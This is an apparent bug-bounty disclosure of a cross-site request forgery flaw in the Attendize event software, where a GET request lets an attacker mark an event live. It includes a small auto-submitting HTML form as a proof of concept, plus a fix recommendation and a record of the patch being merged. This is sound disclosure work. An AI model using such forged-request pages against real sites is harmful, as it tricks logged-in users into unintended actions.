Cross-Site Request Forgery (CSRF) in attendize/attendize

Valid

Reported on

Sep 25th 2021


Description

Attacker is able to make an event live.

Proof of Concept

When you logged in open this POC.html in a browser.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="Demo URL">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability is capable of forging user to unintentional mark an event live.

Test

Tested on Safari.

Fix

You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
We have contacted a member of the attendize team and are waiting to hear back 2 months ago
We have sent a third and final follow up to the attendize team. This report is stale. a month ago
HDVinnie
a month ago

Researcher


To expand:

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" ANYWHERE on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out.

This is why it should be a POST with a @csrf token.

Johanna Cherry validated this vulnerability a month ago
HDVinnie has been awarded the disclosure bounty
The fix bounty is now up for grabs
Johanna Cherry confirmed that a fix has been merged on a2aadf a month ago
Johanna Cherry has been awarded the fix bounty
TopNav.blade.php#L10 has been validated
web.php#L326-L328 has been validated